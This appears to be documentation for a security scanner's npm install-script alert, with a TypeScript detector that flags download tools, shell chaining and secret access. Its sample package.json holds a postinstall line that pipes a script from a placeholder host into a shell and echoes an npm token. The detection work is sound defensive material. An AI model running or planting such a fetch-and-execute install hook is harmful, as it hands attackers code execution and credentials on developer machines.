installScripts

Rendered from docs/alerts/installScripts.md

Flags npm lifecycle scripts that execute automatically during install/uninstall (for example: preinstall, install, postinstall).

Implemented in: src/lib/detection/plugins/install-scripts.ts
Enabled by default: yes

What it means

The package declares one or more lifecycle scripts that will run when a user installs (or uninstalls) the package.

Why it matters

Install scripts can execute arbitrary code on developer machines and CI, and are a common initial execution vector for supply-chain malware.

What to do

  • Review the script commands in package.json and ensure they’re expected.
  • Look for downloads (curl/wget), shell chaining, or secret access.
  • During investigation, consider installing with --ignore-scripts to prevent execution.

Common fields

  • filePath: package.json
  • codeSnippet: the offending "postinstall": "..." (or similar) line
  • metadata.scriptName, metadata.scriptCommand, metadata.suspiciousPatterns
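The review steps above and the fields listed here, as an added example that is not the scanner's own install-scripts.ts: a small TypeScript checker that reads a package.json, picks out the lifecycle scripts, and tags the patterns the "What to do" list names (download tools, shell chaining, secret access). The pattern names and the sample package.json are constructed for the example.

```typescript
// Added example, not the project's plugin: enumerate npm lifecycle scripts
// in a package.json and tag the patterns an investigator is told to look for.

// npm lifecycle hooks that run automatically on install/uninstall.
const LIFECYCLE_SCRIPTS = [
  "preinstall", "install", "postinstall",
  "preuninstall", "uninstall", "postuninstall",
];

// Pattern names are hypothetical; they mirror the doc's "What to do" list.
const SUSPICIOUS_PATTERNS: Array<[string, RegExp]> = [
  ["download", /\b(curl|wget)\b/],
  ["shell-chaining", /(&&|\|\||;|\|)/],
  ["secret-access", /(\.npmrc|\.ssh|process\.env|\$\{?[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD)[A-Z_]*\}?)/],
];

interface InstallScriptFinding {
  filePath: string;
  codeSnippet: string;
  metadata: { scriptName: string; scriptCommand: string; suspiciousPatterns: string[] };
}

// Returns one finding per declared lifecycle script, in hook order.
function findInstallScripts(packageJsonText: string, filePath = "package.json"): InstallScriptFinding[] {
  const pkg = JSON.parse(packageJsonText) as { scripts?: Record<string, unknown> };
  const scripts = pkg.scripts ?? {};
  const findings: InstallScriptFinding[] = [];
  for (const scriptName of LIFECYCLE_SCRIPTS) {
    const command = scripts[scriptName];
    if (typeof command !== "string") continue; // hook not declared
    const suspiciousPatterns = SUSPICIOUS_PATTERNS
      .filter(([, re]) => re.test(command))
      .map(([label]) => label);
    findings.push({
      filePath,
      codeSnippet: `"${scriptName}": ${JSON.stringify(command)}`,
      metadata: { scriptName, scriptCommand: command, suspiciousPatterns },
    });
  }
  return findings;
}

// Constructed sample: a normal native-build hook next to a postinstall that
// downloads and pipes to a shell, chains commands and reads a token variable.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-pkg",
  scripts: {
    build: "tsc -p .",
    install: "node-gyp rebuild",
    postinstall: "curl -s https://example.invalid/setup.sh | sh && echo $NPM_TOKEN",
  },
});
```

Running `findInstallScripts(SAMPLE_PACKAGE_JSON)` yields two findings: `install` with no suspicious patterns, and `postinstall` tagged download, shell-chaining and secret-access.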